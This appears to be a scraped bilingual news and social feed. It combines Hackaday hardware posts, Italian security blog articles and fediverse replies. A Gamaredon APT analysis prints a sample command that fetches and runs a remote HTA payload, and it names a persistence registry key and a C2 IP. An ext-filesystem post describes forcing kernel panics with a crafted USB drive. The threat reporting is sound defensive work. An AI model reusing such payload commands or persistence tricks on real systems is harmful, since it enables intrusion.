This is a project [Inbar Raz] worked on quite a while ago, but only got around to writing up recently. The payphone in question was sourced from the usual surplus market channels, and appears to have been removed from service by Israeli telecommunications company Bezeq only shortly before he found it. It was in pretty good shape, and was even still locked tight, making some amateur locksmithing the first order of the day. The internals of the phone are surprisingly complex, with a motherboard that looks more like something from a PC. Date codes on the chips and through-hole construction date the device to the early- to mid-1990s.
With physical access gained, [Inbar] turned to the firmware. An Atmel flash chip seemed a good place to look, and indeed he was able to pull code off the chip. That’s where things took a turn thanks to the CPU the code was written for — the CDP1806, a later version of the more popular but still fringe CDP1802. This required [Inbar] to fall down the rabbit hole of writing a new processor definition file for Ghidra so that the firmware could be reverse-engineered. This got him to the point of understanding 1806 assembly well enough that he was able to re-flash the phone to print debugging messages on the built-in 16×2 LCD screen, which allowed him to figure out which routines were being called under various error conditions.
It doesn’t appear that [Inbar] ever completed the reverse engineering project, but as he points out, what does that even mean? He got inside, took a look around, and made the phone do some cool things it couldn’t do before, and in the process made things easier for anyone working with 1806 processors in Ghidra. That’s a pretty complete win in our books.
Ministero dell'Istruzione
Dalle 14 di oggi, mercoledì #11dicembre 2024, fino alle 23.59 di lunedì #30dicembre 2024, sarà possibile presentare la domanda di partecipazione alle nuove procedure concorsuali ordinarie, nell’ambito del “concorso PNRR 2”, per le #scuole di ogni ord…Telegram
Delfini in Missione Segreta: Come Proteggono le Basi Nucleari
I delfini attirano da tempo l’attenzione grazie alla loro incredibile intelligenza. Sono spesso raffigurati come creature degli oceani amichevoli, giocose e curiose, ma dietro questa immagine si nasconde un animale con straordinarie capacità di apprendimento, imitazione, consapevolezza di sé e risoluzione di problemi complessi. Queste qualità rendono i delfini un elemento importante dei programmi militari, inclusa la protezione delle basi dei sottomarini nucleari.
Gli Stati Uniti utilizzano i delfini nelle basi navali di King’s Bay in Georgia e Kitsap vicino a Seattle per proteggere gran parte del proprio arsenale nucleare. Ilprogramma per studiare le loro capacità iniziò nel 1959, quando la Marina americana condusse test non solo con i delfini, ma anche con leoni marini, tartarughe, squali e altri animali marini. Tuttavia, solo alcuni, come i delfini tursiopi e i leoni marini della California, hanno dimostrato sufficiente addestrabilità e utilità per scopi militari.
Negli anni ’80, il Navy Marine Mammal Program (NMMP) degli Stati Uniti manteneva più di 100 delfini con un budget di 8 milioni di dollari. Gli animali sono stati addestrati a trovare mine, consegnare messaggi e individuare sabotatori sottomarini. I leoni marini venivano addestrati a recuperare le mine dal fondo e le balene beluga pattugliavano le acque in cerca di minacce. Durante la guerra del Vietnam, i delfini hanno condotto la sorveglianza subacquea nella baia di Cam Ranh e nel 2003 hanno partecipato allo sminamento del porto di Umm Qasr in Iraq.
La chiave del successo dei delfini nelle operazioni militari è la loro ecolocalizzazione. Usando le onde sonore, gli animali sono in grado di formare “immagini” dettagliate del loro ambiente, comprese le acque torbide dove la tecnologia umana è spesso inutile. La loro resistenza fisica e la capacità di immergersi a grandi profondità rendono i delfini preziosi per la ricerca di oggetti come le mine in condizioni difficili.
Tuttavia, l’uso dei delfini per scopi militari è controverso. Attivisti per i diritti umani e gruppi ambientalisti hanno criticato tali programmi per lo sfruttamento degli animali senza autonomia e per i rischi che corrono nelle missioni pericolose. Tuttavia, i delfini rimangono una parte importante delle operazioni militari. Oggi, la Marina degli Stati Uniti addestra circa 85 delfini tursiopi e un piccolo numero di leoni marini.
Questi programmi, nonostante le questioni etiche, continuano a svilupparsi, offrendo opportunità uniche in condizioni in cui la tecnologia umana è ancora inferiore alle capacità naturali di questi animali.
L'articolo Delfini in Missione Segreta: Come Proteggono le Basi Nucleari proviene da il blog della sicurezza informatica.
ONU. Linee guida per contrastare violazioni dei diritti umani nella conservazione della natura
@Notizie dall'Italia e dal mondo
Il nuovo “Core Human Rights Principles for Private Conservation Organisations and Funders” elenca gli standard minimi che dovrebbero essere rispettati dalle organizzazioni che si occupano di ambiente
L'articolo ONU.
Social, smartphone e i danni sui ragazzi: si sta finalmente aprendo il dibattito tra colpevolisti e innocentisti
Questo post è stato pubblicato inizialmente dall'account @cybersecurity[url=https://www.informapirata.it/author/poliverso/]@poliverso[/url].org a maggio del 2024 ma è stato accidentalmente cancellato. Il nostro [url=https://www.informapirata.it/author/skariko/]@skariko[/url]@poliversity.it è riuscito Tuttavia a recuperare la copia cache dalla comunità Lemmy di @eticadigitale@feddit.it salvata da archive.org!
Ci scusiamo soprattutto con le persone che hanno partecipato alla vecchia discussione:
IL WHISTLEBLOWING
Fino pochi mesi fa, il dibattito inerente gli effetti dello smartphone sulla salute mentale dei ragazzi rimaneva piuttosto sonnolento.
Ogni tanto poteva giungere notizia di qualche dipendente GAFAM che denunciava il proprio datore di lavoro di ignorare i segnali allarmanti (ultimo è il caso della psicologa danese Lotte Rubæk) (archive) che provenivano dall’utenza più giovane, ma in generale le accuse contro la tecnologia si rivelavano poco incisive, mentre le risposte da parte dei granti attori della tecnologia si limitavano a un no-comment, in base al principio per cui una smentita non sarebbe altro che “una notizia data due volte” (archive).
L’ALLARME LANCIATO DAL DR. VIVEK MURTY
A metà marzo tuttavia ha avuto una certa eco l’articolo di Robert Booth, corrispondente per gli affari sociali di The Guardian che ha riportato le preoccupazioni del dr. Vivek Murthy, (archive)“Chirurgo generale” degli Stati Uniti, ossia capo della sanità pubblica statunitense, il quale esorta i governi a regolamentare i social dal momento che uno studio (archive) mostra che l’uso dello schermo e l’isolamento hanno causato un malessere diffuso.
“per la prima volta da quando sono stati raccolti i primi dati nel 2012, i giovani tra i 15 e i 24 anni in Nord America affermano di essere meno felici delle generazioni più anziane”
Murthy ha lanciato un avvertimento formale a tutti gli Stati Uniti sul fatto che i social media presentano “un profondo rischio di danno” per la salute mentale e il benessere di bambini e adolescenti, in base a un principio di cautela.
“Non abbiamo ancora prove sufficienti per determinare se i social media siano sufficientemente sicuri” da poter essere utilizzati
MALESSERE GIOVANILE: UN PROBLEMA PER LA DEMOCRAZIA?
Pochi giorni dopo, Vanessa “Van” Badham, drammaturga, scrittrice e attivista australiana sempre sul Guardian (archive)ha messo in guardia genitori, insegnanti e autorità sull’impatto che questa infelicità potrebbe avere sugli equilibri democratici.
LA GENERAZIONE ANSIOSA: COME IL GRANDE RICABLAGGIO DELL’INFANZIA STA CAUSANDO UN’EPIDEMIA DI MALATTIE MENTALI
Bambina immersa nei social
Il culmine di questa serie di accuse contro la tecnologia ha però coinciso con la pubblicazione dell’ultimo libro di Jonathan Haidt, The Anxious Generation: How the Great Rewiring of Childhood Is Causing an Epidemic of Mental Illness (archive), che costituisce un vero e proprio atto d’accusa sul collasso della salute mentale dei giovani e allo stesso tempo una proposta per mitigare gli effetti della tecnologia invasiva e reimpostare un’infanzia più sana e più libera.
LA RECENSIONE DI NATURE
A questo punto si è scatenato il confronto critico verso le conclusioni di questi studi colpevolisti.
Ad aprire le danze è stata la rivista Nature che, a firma della dott.ssa Candice L. Odgers, professoressa di Scienze Psicologiche e Informatica per la School of Social Ecology e professoressa a contratto dell’Università della California, ha recensito il volume di Haidt (archive)accusandolo di scarsa accuratezza scientifica.
La tesi della prof.ssa Odgers è che il tempo passato davanti allo schermo non sia necessariamente responsabile dell’aumento dei livelli di depressione e ansia adolescenziale; d’altra parte la crescente isteria collettiva su questi argomenti potrebbe distrarre l’opinione pubblica e la scienza dall’affrontare le vere cause.
In sostanza:
- Haidt non avrebbe portato prove di causalità tra esposizione alla tecnologia e depressione
- la vera causa sarebbe, soprattutto rispetto all’area statunitense, “la discriminazione strutturale e il razzismo, il sessismo e l’abuso sessuale, l’epidemia di oppioidi, le difficoltà economiche e i problemi sociali”
Il “grande ricablaggio” sarebbe dunque un argomento fantoccio e questa tesi tranquillizzante è stata ripresa da diversi giornalisti in tutto il mondo per “riequilibrare” le prese di posizione recenti con una opportuna dose di innocentismo.
LA RISPOSTA DELL’AUTORE
Haidt ha risposto rapidamente sul blog di psicologia After Babel (archive) confutando le due obiezioni sollevate dalla prof.ssa Odgers, attraverso la rappresentazione di diversi dati a suffragio delle proprie argomentazioni e, d’altra parte, affermando che l’aumento di questo malessere non può essere dovuto alle cause alternative suggerite su Nature in quanto, pur impattando sul benessere dei ragazzi, erano preesistenti alla brusca accelerazione del fenomeno.
LA REALTÀ POLITICA E GIUDIZIARIA ENTRANO IN GIOCO
Contemporaneamente al botta e risposta tra i due studiosi, ecco che la cronaca politica e giudiziaria entra a gamba tesa sui dibattiti.
Dopo Utah, Arkansas, Louisiana, Ohio e Texas (e dopo la clamorosa causa intentata da New York ai colossi di Internet) e contemporaneamente alle iniziative di Ron de Santis in Florida (archive), anche l’amministrazione cittadina di New York infatti vuole fare causa ai giganti dei social media, sostenendo che le loro pratiche commerciali possono avere un impatto nocivo sulla salute mentale dei giovani (archive)!
L’articolo di Angelo Alù su Agenda Digitale presenta un riepilogo interessante di tutta la vicenda, dalle accuse ai social media (archive), alle iniziative di supporto intraprese dall’amministrazione cittadina (archive) e rimanda alla ingente documentazione presente nell’atto ufficiale presentato in tribunale dalla municipalità (archive).
CONTRIBUTI INNOCENTISTI SU VALIGIA BLU
L’ultimo articolo degno di menzione, su un piano di totale innocentismo, è l’articolo comparso su Valigia Blu a firma di Tiziana Metitieri, psicologa che coordina le attività dell’ambulatorio di neuropsicologia clinica dell’ospedale pediatrico Meyer e che si è sempre opposta all’approccio proibizionista (archive) e cautelativo verso l’utilizzo della tecnologia da parte dei bambini.
Nel suo ultimo articolo (archive), afferma sulla scorta degli studi citati (archive) che
“In tutti i paesi e per tutti i dati demografici, le persone che avevano accesso a Internet, accesso a uno smartphone o che utilizzavano attivamente Internet riportavano maggiori livelli di soddisfazione di vita, esperienze positive, senso di scopo e benessere fisico, comunitario e sociale, e livelli più bassi di esperienze negative”
CONCLUSIONI
Questo confronto tra orientamenti diversio e a volte diametralmente opposti può disorientare la pubblica opinione, ricordando molto il confronto che si è avuto per decenni sul fumo, un dibattito che ha visto la capacità del potere economico di “sopire troncare … troncare sopire” la verità scientifica.
Siamo decisamente convinti che il combinato di smartphone e social network costituisca un pericolo esistenziale per il futuro dei ragazzi, ma siamo anche certi che il dibattito che si è avuto fino a un anno fa non abbia ancora raggiunto la giusta maturità.
In questo senso è importantissimo che le parti avverse si confrontino presentando dati ed evidenze scientifiche sempre più convincenti.
Per quello che ci riguarda, crediamo anche che l’accesso alla tecnologia e ai social sia una grandissima opportunità per i ragazzi, ma che questo accesso debba essere mediato non tanto da limitazioni di carattere infrastrutturale (sistemi di controllo parentale, hardware limitato) ma dall’unica componente in grado di trasformare le informazioni in conoscenza, ossia la cultura. Nello specifico la cultura digitale che con saggezza e accortezza può essere trasmessa ai bambini fin dalla più tenera età, attraverso il ruolo fondamentale dei genitori in primo luogo e in seconda battuta della scuola.
Alcuni dei vecchi commenti al post eliminato sono stati conservati qui
Vuoi segnalare un errore o dare un suggerimento? Scrivici su Friendica, Twitter, Mastodon o sul gruppo telegram Comunicazione Pirata
Segui il canale di InformaPirata
PALESTINA. Artisti chiedono pace, giustizia e libertà
@Notizie dall'Italia e dal mondo
"Viva Viva Palestina" è una rete di artisti che nasce a Genova e che ha come finalità la diffusione e la divulgazione della cultura e dell’arte della Palestina. Insieme a Defence for Children International Italia, il 16 dicembre organizzeranno un grande evento a scopo benefico
L'articolo PALESTINA. Artisti
L’UE perde 5 miliardi di euro di tasse digitali all’anno, secondo uno studio del Centro per le politiche europee
L'articolo proviene da #Euractiv Italia ed è stato ricondiviso sulla comunità Lemmy @Intelligenza Artificiale
Il capitalismo digitale rischia di lasciare l’Europa indietro. È quanto emerge da uno studio condotto
The Math Behind the Music of the 80s
Although there might have been other music produced or recorded in the 1980s, we may never know of its existence due to the cacophony of all of the various keytars, drum machines, and other synthesized music playing nonstop throughout the decade. There was perhaps no more responsible synthesizer than the Yamaha DX7 either; it nearly single-handedly ushered in the synth pop era. There had been other ways of producing similar sounds before but none were as unique as this keyboard, and for ways beyond just its sound as [Kevin] describes in this write-up.
Part of the reason the DX7 was so revolutionary was that it was among the first accessible synthesizers that was fully digital, meaning could play more than one note at a time since expensive analog circuitry didn’t need to be replicated for multiple keys. But it also generated its tones by using frequency modulation of sine waves in a way that allowed many signals to be combined to form different sounds. While most popular musicians of the 80s used one of the preset sounds of the synthesizer, it could produce an incredible range of diverse sounds if the musician was willing to dig a bit into the programming of this unique instrument.
There were of course other reasons this synthesizer took off. It was incredibly robust, allowing a musician to reliably carry it from show to show without much worry, and it also stood on the shoulders of giants since musicians had been experimenting with various other types of synthesizers for the previous few decades. And perhaps it was at the right place and time for the culture as well. For a look at the goings on inside the chip that powered the device, [Ken Shirriff] did a deep dive into one a few years ago.
Contrasto internazionale alla «dark fleet»: c'è chi suggerisce di impiegare Carabinieri e Guardia di Finanza per combattere gli armatori che aiutano la Russia ad eludere le sanzioni
##
La «dark fleet» (letteralmente Flotta Oscura) è una rete di navi e armatori che aiuta la Russia a eludere le sanzioni occidentali trasportando petrolio e altri beni, ponendo una sfida all’applicazione del regime delle sanzioni (maritime-professionals.com/the…).
Recentemente un rapporto del think thank Usa Atlantic Council esalta le forze di polizia italiane, che hanno le competenze più indicate al mondo per smascherare gli armatori ombra. Il rapporto (atlanticcouncil.org/in-depth-r…) suggerisce che i governi occidentali dovrebbero sfruttare forze investigative come i Carabinieri italiani e la Guardia di Finanza per scoprire le vere strutture proprietarie di queste navi.
Una volta individuate, misure come negare il visto ai proprietari e alle loro famiglie dovrebbero essere utilizzate come deterrente.
Il coinvolgimento di Carabinieri e la Guardia di Finanza italiani viene presentato come una potenziale soluzione per i governi occidentali che cercano di affrontare questo problema.
Ad esempio l’UE sta valutando un nuovo pacchetto di sanzioni che consentirebbe agli Stati membri del Mar Baltico di ispezionare il carico e i documenti delle navi, comprese le petroliere, nelle loro acque.
Il Regno Unito ha iniziato a richiedere dati assicurativi alle navi che transitano lungo la sua costa meridionale.
Viene inoltre suggerito che un’agenzia europea dedicata istituisca un sistema di tracciamento per la flotta oscura.
Altra misura potrebbe essere fare pressione sui registri delle “bandiere di comodo”.
Il rapporto rileva che, dietro le quinte, i governi occidentali hanno cercato di fare pressione su alcuni stati affinché si astenessero dal registrare le navi della «flotta oscura», ma questi sforzi non hanno avuto successo.
Il rapporto chiede quindi un maggiore impegno da parte degli stati costieri per contrastare queste “bandiere di comodo” utilizzate dalla «flotta oscura».
Oltre il 20% delle navi della «flotta oscura» si sono rifiutate di utilizzare i piloti durante l’attraversamento dello stretto danese, il che è visto come un modo per evitare controlli.
Incoraggiare l'utilizzo dei piloti invocando i principi di "buona condotta marittima" viene suggerito come potenziale deterrente.
L’obiettivo generale è aumentare la trasparenza ed il monitoraggio della «flotta oscura» per ostacolare la sua capacità di aiutare la Russia a eludere le sanzioni.
Il rapporto avverte inoltre che, man mano che la flotta oscura continua a operare e a crescere, emergerà un settore marittimo alternativo che minaccia non solo le singole navi e gli stati costieri, ma il funzionamento dell’ordine marittimo globale.
Il gran finale di Microsoft per il 2024: 1 Zero-Day, 71 CVE e una corsa contro il tempo
Con il Patch Tuesday di dicembre, Microsoft chiude il 2024 con un’ultima serie di aggiornamenti di sicurezza, portando il totale del mese a 71 CVE (Common Vulnerabilities and Exposures). Questo mese segna la terza più ridotta distribuzione di patch dell’anno, preceduta solo da gennaio e giugno. Tuttavia, la dimensione ridotta non significa che manchino criticità: tra le vulnerabilità risolte, figura un pericoloso zero-day già sfruttato attivamente, CVE-2024-49138.
La Vulnerabilità CVE-2024-49138
Questa vulnerabilità di elevazione dei privilegi colpisce il sistema Windows Common Log File System e consente agli attaccanti di ottenere privilegi SYSTEM, il che significa accesso completo al sistema bersaglio. Non sorprende che Microsoft abbia posto un accento particolare su questa falla, considerando che è già oggetto di attacchi attivi e riguarda ogni versione supportata di Windows e Windows Server. L’applicazione immediata delle patch è cruciale per prevenire potenziali compromissioni, mentre Microsoft ha fornito poche informazioni tecniche, se non per sottolineare la gravità del problema.
Oltre allo Zero-Day, tra le 16 vulnerabilità classificate come “critiche”, spicca CVE-2024-49112, una falla di esecuzione di codice remoto nel protocollo Windows Lightweight Directory Access Protocol (LDAP). Con un punteggio di gravità di 9.8 su 10, è questione di tempo prima che venga sfruttata attivamente.
Per chi non può aggiornare immediatamente, Microsoft ha fornito mitigazioni temporanee:
- Configura i controller di dominio per bloccare l’accesso a Internet.
- Impedisci l’accesso RPC in ingresso da reti non fidate.
Queste misure non solo proteggono contro CVE-2024-49112, ma rappresentano buone pratiche di sicurezza generale, come sottolineato da Tyler Reguly, direttore associato di Security R&D presso Fortra. “Microsoft ha fornito mitigazioni che sono fondamentalmente norme di buona gestione informatica, ma servono come promemoria importante per le imprese,” ha dichiarato Reguly.
Il protocollo Windows Remote Desktop Services continua a essere un bersaglio privilegiato per gli attaccanti, con 9 delle vulnerabilità critiche di questo mese che riguardano l’esecuzione di codice remoto in questa componente. Questo evidenzia quanto sia essenziale per le aziende adottare configurazioni sicure e applicare immediatamente gli aggiornamenti forniti.
Altre vulnerabilità rilevanti includono falle critiche in componenti chiave come LSASS, Hyper-V e Microsoft Message Queuing (MSMQ), tutte potenziali vettori per attacchi devastanti se non affrontate tempestivamente.
Conclusione
Microsoft chiude il sipario del 2024 con un ultimo Zero-Day e un pacchetto di patch che richiede attenzione immediata. Agire con rapidità è essenziale per proteggere i sistemi e prepararsi al futuro di un panorama di minacce in continua evoluzione.
Nel 2025, la parola d’ordine sarà prevenzione: applicare tempestivamente le patch oggi rappresenta l’investimento più efficace per evitare interruzioni critiche e vulnerabilità costose in futuro.
L'articolo Il gran finale di Microsoft per il 2024: 1 Zero-Day, 71 CVE e una corsa contro il tempo proviene da il blog della sicurezza informatica.
Oggi, 11 dicembre, 80 anni fa
Nasce a Monghidoro (Bologna) Gianni Morandi.
Da giovane lavora come venditore di bibite nel cinema della sua città, ma anche come aiutante del padre nel negozio di calzolaio.
Diverrà uno dei più famosi cantanti italiani, anche all'estero, nonché attore e presentatore televisivo.
Utilizzavano AirBnb per allestire call center fraudolenti. Accade in Belgio e Paesi Bassi
Europol denuncia l’arresto di otto membri di un gruppo internazionale di criminalità informatica che ha rubato milioni di euro alle sue vittime. Gli indagati hanno affittato immobili e appartamenti di lusso tramite Airbnb e vi hanno creato call center fraudolenti.
I membri del gruppo sono stati arrestati in Belgio e nei Paesi Bassi all’inizio di dicembre 2024. È stato inoltre riferito che contemporaneamente in due paesi sono state effettuate 17 perquisizioni, durante le quali la polizia ha sequestrato supporti di memorizzazione, telefoni e vari oggetti di lusso, che presumibilmente sarebbero stati acquistati con i proventi di crimini informatici.
La polizia olandese riferisce dell’arresto di tre uomini e una donna, di età compresa tra 23 e 66 anni. I sospettati sono accusati di phishing, frode online, frode bancaria, riciclaggio di denaro e coinvolgimento in attività criminali informatiche.
Secondo le forze dell’ordine, il gruppo ha condotto le sue campagne di phishing da call center temporanei che i truffatori hanno allestito in appartamenti di lusso affittati tramite Airbnb.
I truffatori hanno contattato le vittime dei paesi europei tramite e-mail, SMS o messaggi WhatsApp e si sono spacciati per impiegati di banca o funzionari delle forze dell’ordine che presumibilmente lavorano per combattere le frodi. Hanno scritto e chiamato le vittime, sostenendo che i loro conti erano stati compromessi e invitando le persone a cliccare rapidamente sui collegamenti ai siti di phishing che imitavano le banche reali.
Se un utente si innamorava dei truffatori (e il bersaglio degli aggressori erano spesso persone anziane) e immetteva i propri dati personali su queste pagine dannose, queste finivano nelle mani degli aggressori, che svuotavano rapidamente gli account della vittima.
Allo stesso tempo, secondo gli investigatori, gli aggressori hanno speso i fondi rubati in un modo molto insolito: acquistando viaggi costosi, abiti firmati, orologi premium, auto di lusso e organizzando feste in club chiusi.
Le forze dell’ordine hanno botato che i sospettati non hanno nemmeno cercato di nascondersi e hanno apertamente dimostrato uno stile di vita lussuoso sui social network, pubblicando regolarmente immagini di beni costosi e foto con celebrità.
L'articolo Utilizzavano AirBnb per allestire call center fraudolenti. Accade in Belgio e Paesi Bassi proviene da il blog della sicurezza informatica.
APT-C-53 (Gamaredon): Analisi delle Attività di Cyber Spionaggio
Il gruppo di Advanced Persistent Threat (APT) APT-C-53, noto anche come Gamaredon, Primitive Bear, Winterflounder e BlueAlpha, è un’entità di cyber spionaggio sponsorizzata dallo stato russo. Attivo dal 2013, è focalizzato su operazioni di intelligence contro organizzazioni governative, enti della difesa, istituzioni diplomatiche e media, con particolare attenzione all’Ucraina. Questo articolo fornisce un’analisi tecnica dettagliata delle metodologie e degli strumenti utilizzati da APT-C-53 nelle operazioni più recenti, facendo riferimento ai dati forniti da diverse fonti di Threat Intelligence, inclusa un’analisi pubblicata su WeChat.
Tecniche di Attacco e Vettori di Infezione
La mappa delle connessioni riportata nell’immagine evidenzia chiaramente la complessità dell’infrastruttura e delle tattiche impiegate dal gruppo APT-C-53 (Gamaredon). Come mostrato, l’attacco è caratterizzato da una rete intricata di indirizzi IP, domini malevoli e diverse tipologie di file utilizzati per distribuire i payload. Ogni nodo rappresenta un elemento cruciale della catena di infezione, mentre le frecce illustrano le relazioni tra i vari componenti del processo di attacco, dai server di comando e controllo (C2) fino ai file malevoli utilizzati per compromettere i sistemi delle vittime.
L’analisi visiva consente di comprendere come APT-C-53 sfrutti più vettori contemporaneamente per garantire il successo delle sue campagne di cyber spionaggio. Nei paragrafi seguenti, analizzeremo in dettaglio le tecniche di attacco più rilevanti e i vettori di infezione identificati, facendo riferimento ai collegamenti mostrati nell’immagine.
1. File LNK Maligni
APT-C-53 utilizza file di collegamento Windows (LNK) come vettore iniziale di infezione. Questi file contengono comandi che vengono eseguiti tramite processi legittimi come mshta.exe
. L’obiettivo è eseguire script remoti dannosi senza destare sospetti. I file LNK sono spesso inseriti in archivi compressi distribuiti tramite email di phishing.
Esempio di Comando LNK:
mshta http://malicious-domain/payload.hta
2. File XHTML Malevoli
Un altro vettore di attacco comune è l’uso di file XHTML che scaricano e eseguono payload dannosi. Questi file vengono mascherati da documenti legittimi e, una volta aperti, eseguono script che stabiliscono una connessione con un server di comando e controllo (C2) per il download del malware principale.
Tecnica di Download Dinamico:
3. Campagne di Spear-Phishing
APT-C-53 eccelle nelle campagne di spear-phishing mirate. Le email sono personalizzate per ingannare specifici destinatari, spesso utilizzando temi rilevanti per il contesto geopolitico e istituzionale della vittima. Gli allegati includono documenti Office compromessi o archivi compressi contenenti file LNK o script dannosi.
Strumenti e Malware Impiegati
1. Pteranodon
Un trojan modulare utilizzato per ottenere accesso remoto ai sistemi infetti. Consente di eseguire comandi, esfiltrare dati e scaricare ulteriori moduli malevoli.
Funzionalità principali:
- Esecuzione di comandi remoti
- Esfiltrazione di file sensibili
- Persistenza tramite chiavi di registro
2. LitterDrifter
Un worm scritto in VBScript (VBS) progettato per diffondersi tramite unità USB rimovibili. Questo malware sfrutta il trasferimento fisico di dispositivi per penetrare reti isolate.
Meccanismo di Diffusione:
- Copia del file VBS nelle unità rimovibili
- Creazione di file LNK dannosi nella root dell’unità USB
- Esecuzione automatica tramite modifiche al file
autorun.inf
3. GammaLoad e GammaSteel
Varianti di malware utilizzate per eseguire il download di ulteriori payload e mantenere il controllo persistente del sistema compromesso. Entrambi i malware sfruttano script PowerShell per comunicare con i server C2 e ricevere comandi dinamici.
Tecniche di Persistenza e Obfuscation
APT-C-53 implementa diverse tecniche di persistenza per mantenere l’accesso ai sistemi compromessi:
- Modifiche al Registro di Sistema:
- Esecuzione automatica dei payload malevoli tramite chiavi di registro:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
- Obfuscation degli Script:
- Uso di stringhe codificate in Base64, compressione e tecniche di offuscamento del codice per eludere i sistemi di rilevamento.
- Infettare Dispositivi Rimovibili:
- Propagazione del malware tramite unità USB, facilitando la diffusione in ambienti chiusi o con limitata connettività esterna.
Infrastruttura di Comando e Controllo (C2)
L’infrastruttura C2 di APT-C-53 è composta da server che forniscono payload malevoli e ricevono dati esfiltrati. Il gruppo utilizza:
- Indirizzi IP Dinamici e domini temporanei per evitare il blocco delle comunicazioni.
- Tecniche di Fast Flux per cambiare frequentemente gli indirizzi IP associati ai domini C2.
Esempio di IP associato: 5.181.189.32
Settori Colpiti
I settori principali presi di mira da APT-C-53 includono:
- Governo
- Difesa
- Diplomazia
- Media
- Attivisti e ONG
APT-C-53 (Gamaredon) rappresenta una delle minacce più persistenti e sofisticate nell’ambito del cyber spionaggio. L’utilizzo di tecniche avanzate di infezione, obfuscation e persistenza sottolinea l’importanza di implementare misure di sicurezza robuste come:
- Filtri avanzati per email e allegati
- Monitoraggio delle modifiche al registro di sistema
- Segmentazione della rete e restrizioni sui dispositivi USB
- Aggiornamenti costanti dei sistemi di rilevamento delle minacce
Rimanere aggiornati sulle TTP (Tactics, Techniques, and Procedures) di Gamaredon è essenziale per proteggere le infrastrutture critiche e prevenire potenziali compromissioni.
L'articolo APT-C-53 (Gamaredon): Analisi delle Attività di Cyber Spionaggio proviene da il blog della sicurezza informatica.
From Felt to Fate: Building Your Own Sorting Hat
Ever wondered how it feels to have the Sorting Hat decide your fate? [Will Dana] wanted to find out, so he conjured a bit of Hogwarts magic, and crafted a fully animatronic Sorting Hat from scratch. In the video below, he covers every step of bringing this magical purple marvel to life—from rapid joystick movements to the electronics behind it all.
The heart of the project is two 9g servos—one actuates the mouth, and the other controls the eyebrows—powered by an ESP32 microcontroller. Communication between two ESP32 boards ensures smooth operation via the ESP-NOW protocol, making this a wireless wonder. The design process involved using mechanical advantage to solve jittery servo movements, a trick that will resonate with anyone who’s fought with uncooperative motors.
If animatronics or themed projects excite you, Hackaday has covered similar builds, from a DIY BB-8 droid to a robot fox.
youtube.com/embed/I_xfRrZDjNA?…
L’AGI è ancora lontano? Ecco il test ARC-AGI che mette in palio Un Milione di Dollari
L’AI General Guidance Test (AGI), sviluppato nel 2019 da Francois Chollet, ha portato a importanti scoperte sui limiti della tecnologia. Gli autori del test affermano che i risultati sono più una prova di carenze che una vera svolta nel campo della ricerca AGI.
Il test ARC-AGI (Abstract and Reasoning Corpus for Artificial General Intelligence) è stato progettato come strumento per valutare la capacità dell’IA di apprendere nuove competenze oltre i dati di addestramento.
Fino al 2024, i migliori modelli di intelligenza artificiale potrebbero risolvere meno di un terzo dei problemi ARC-AGI. Chollet ha criticato l’attenzione dell’industria sui modelli linguistici di grandi dimensioni (LLM), ritenendo che fossero incapaci di un vero “ragionamento”. Secondo Chollet, gli LLM si basano esclusivamente sulla memorizzazione, il che li rende vulnerabili alle sfide che vanno oltre il set di dati di formazione.
Per stimolare la ricerca oltre il LLM, Chollet, insieme a Mike Knoop, co-fondatore di Zapier, ha lanciato un concorso da 1 milione di dollari nel giugno 2024 per creare un sistema di intelligenza artificiale aperto in grado di battere ARC-AGI. Il miglior risultato della competizione è stato del 55,5%, quasi il 20% in più rispetto al record precedente, ma ancora lontano dalla soglia dell’85%, considerata il “livello umano” e necessario per vincere.
Come ha osservato Knoop nel blog, tali risultati non indicano progressi significativi verso la creazione dell’AGI. Molti partecipanti al concorso hanno utilizzato un approccio di forza bruta per trovare soluzioni, il che mette in discussione il valore dei compiti dell’ARC-AGI per la valutazione dell’intelligenza generale.
ARC-AGI prevede compiti in cui l’IA deve generare risposte corrette sotto forma di griglie composte da quadrati di diversi colori. I compiti sono volti a testare la capacità di adattamento a nuovi problemi. Tuttavia, l’efficacia di questo approccio ha sollevato dubbi.
Griglia di output della risposta ARC-AGI ( arcprize.org )
Gli ideatori del test ne riconoscono le imperfezioni. Secondo Knoop, il test è rimasto invariato sin dal suo inizio e le critiche nei suoi confronti come strumento per ottenere l’AGI non hanno fatto altro che aumentare.
Il concetto stesso di AGI è ulteriormente controverso: alcuni esperti ritengono che l’AGI sia già stata raggiunta se interpretata come la capacità dell’IA di sovraperformare gli esseri umani nella maggior parte dei compiti.
Gli esperti prevedono di presentare la seconda versione del test ARC-AGI nel 2025, il cui obiettivo principale è indirizzare gli sforzi della comunità di ricerca per risolvere problemi chiave nel campo dell’IA e accelerare l’approccio all’AGI.
L'articolo L’AGI è ancora lontano? Ecco il test ARC-AGI che mette in palio Un Milione di Dollari proviene da il blog della sicurezza informatica.
A Potential Exploit with the Ext Filesystem
The extended filesystem, otherwise known as ext, has been a fundamental part of Linux since before the 1.0 release in 1994. Currently the filesystem is on its fourth major revision, in use since its release in 2008 thanks to its stability, reliability, and backwards compatibility with the other ext filesystem versions. But with that much history there are bound to be a few issues cropping up here and there. [Will] recently found an exploit with this filesystem that can cause a Linux kernel to immediately panic when a manipulated USB drive is inserted into a computer.
[Will] discovered this quirk when investigating the intricacies of the filesystem for problems and other vulnerabilities. A tool called tune2fs, used for administering and modifying ext filesystems, includes the ability to pass certain commands to the Linux kernel when certain situations arise with the filesystem itself, including that the kernel should panic. One situation is that the ext filesystem itself becomes corrupted, which can then cause the kernel panic. Armed with this knowledge, a USB drive can be purposefully given a corrupted ext filesystem which, when plugged into a Linux machine, can cause the computer to shut down.
The post linked above goes into some discussion about how this exploit could be used maliciously to gain access to a Linux system, including rebooting computers where no access to a power button is otherwise enabled or making other changes to the system before needing a reboot to apply the changes. In general, though, it’s good to assume an attacker could take any route to gain access to a machine. This exploit from a few years ago, for example, allowed another Linux tool to be used to gain root access.
Thanks to [Timothy] for the tip!
Elena ``of Valhalla''
in reply to floreana • • •rag. Gustavino Bevilacqua reshared this.
floreana
Unknown parent • •Eh, per risparmiare un mese di costi, vuoi mettere? 🙄
Ma almeno si è preso la briga il gran capo di venire con l'HR fino a Berlino.
Ad maiora!
Elena ``of Valhalla''
in reply to floreana • • •floreana
Unknown parent • •Beh, la ditta è italiana. Da quello che mi raccontano i licenziamenti in Germania possono essere anche più brutali. 😬